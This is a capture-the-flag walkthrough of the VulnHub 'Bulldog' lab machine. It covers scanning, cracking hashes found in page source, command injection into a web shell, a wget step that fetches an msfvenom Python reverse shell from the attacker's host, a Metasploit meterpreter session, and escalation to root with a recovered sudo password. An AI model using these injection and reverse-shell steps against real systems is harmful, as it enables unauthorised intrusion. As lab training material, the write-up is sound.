Bulldog – VulnHub
In this CTF writeup i am going to give you a walkthrough of “Bulldog” which is a vulnerable machine designed for security enthusiasts to increase their vulnerability assessment and penetration skills.
You can download this machine from Vulnhub link provided.
1. Start with Nmap “nmap -sV 192.168.1.158”
2. As we can see port 23 is open,,,, tried telnet and netcat but no luck
root@kali:~# telnet 192.168.1.158 23
Trying 192.168.1.158…
Connected to 192.168.1.158.
Escape character is ‘^]’.
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2
Protocol mismatch.
Connection closed by foreign host.
3. Try dirb on the host and got few links
root@kali:~# dirb http://192.168.1.158
—————–
DIRB v2.22
By The Dark Raver
—————–
START_TIME: Wed Nov 22 04:29:57 2017
URL_BASE: http://192.168.1.158/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
—————–
GENERATED WORDS: 4612
—- Scanning URL: http://192.168.1.158/ —-
==> DIRECTORY: http://192.168.1.158/admin/
==> DIRECTORY: http://192.168.1.158/dev/
+ http://192.168.1.158/robots.txt (CODE:200|SIZE:1071)
—- Entering directory: http://192.168.1.158/admin/ —-
==> DIRECTORY: http://192.168.1.158/admin/auth/
==> DIRECTORY: http://192.168.1.158/admin/login/
==> DIRECTORY: http://192.168.1.158/admin/logout/
—- Entering directory: http://192.168.1.158/dev/ —-
==> DIRECTORY: http://192.168.1.158/dev/shell/
—- Entering directory: http://192.168.1.158/admin/auth/ —-
==> DIRECTORY: http://192.168.1.158/admin/auth/group/
==> DIRECTORY: http://192.168.1.158/admin/auth/user/
—- Entering directory: http://192.168.1.158/admin/login/ —-
—- Entering directory: http://192.168.1.158/admin/logout/ —-
—- Entering directory: http://192.168.1.158/dev/shell/ —-
—- Entering directory: http://192.168.1.158/admin/auth/group/ —-
(!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}.
(Try using FineTunning: ‘-f’)
—- Entering directory: http://192.168.1.158/admin/auth/user/ —-
(!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}.
(Try using FineTunning: ‘-f’)
—————–
END_TIME: Wed Nov 22 04:32:16 2017
DOWNLOADED: 32284 – FOUND: 1
4. Open the directories we got in dirb
http://192.168.1.158/dev/
http://192.168.1.158/dev/shell/
http://192.168.1.158/admin/
On viewing page source of http://192.168.1.158/dev/ we got
5. We Google these hashes and got the password for nick/bulldog
6. Now login to the admin page and open http://192.168.1.158/dev/shell/ but on web shell we have options to run limited commands
but you can do command injection using && operator.
7. We will use wget to get the shell transfer from kali to local machine
create a rev shell in python using msfvenom
transfer it using wget ls && wget http://192.168.1.6:3000/shell.py
Make sure you give shell.py execute permission
Now setting up a listener
msf > use exploit/multi/handler
msf exploit(handler) > set payload python/meterpreter/reverse_tcp_uuid
payload => python/meterpreter/reverse_tcp_uuid
msf exploit(handler) > set RHOST 192.168.1.158
RHOST => 192.168.1.158
msf exploit(handler) > set LPORT 7000
LPORT => 7000
msf exploit(handler) > set LHOST 192.168.1.6
LHOST => 192.168.1.6
msf exploit(handler) > run
[*] Started reverse TCP handler on 192.168.1.6:7000
[*] Starting the payload handler…
[*] Sending stage (40044 bytes) to 192.168.1.158
[*] Meterpreter session 1 opened (192.168.1.6:7000 -> 192.168.1.158:43296) at 2017-11-30 03:01:47 -0500
8. Now as we have meterpreter session
we will transfer linux privchecker
Go to
meterpreter > ls
Listing: /home/bulldogadmin/.hiddenadmindirectory
take the interactive shell by typing shell on meterpreter
9.
$ python -c ‘import pty; pty.spawn(“/bin/bash”)’
To run a command as administrator (user “root”), use “sudo <command>”.
See “man sudo_root” for details.
bash: /root/.bashrc: Permission denied
django@bulldog:/.hiddenAVDirectory$ sudo su –
sudo su –
Sorry, try again.
[sudo] password for django: SUPERultimatePASSWORDyouCANTget
root@bulldog:~# id
id
uid=0(root) gid=0(root) groups=0(root)
Nice Content !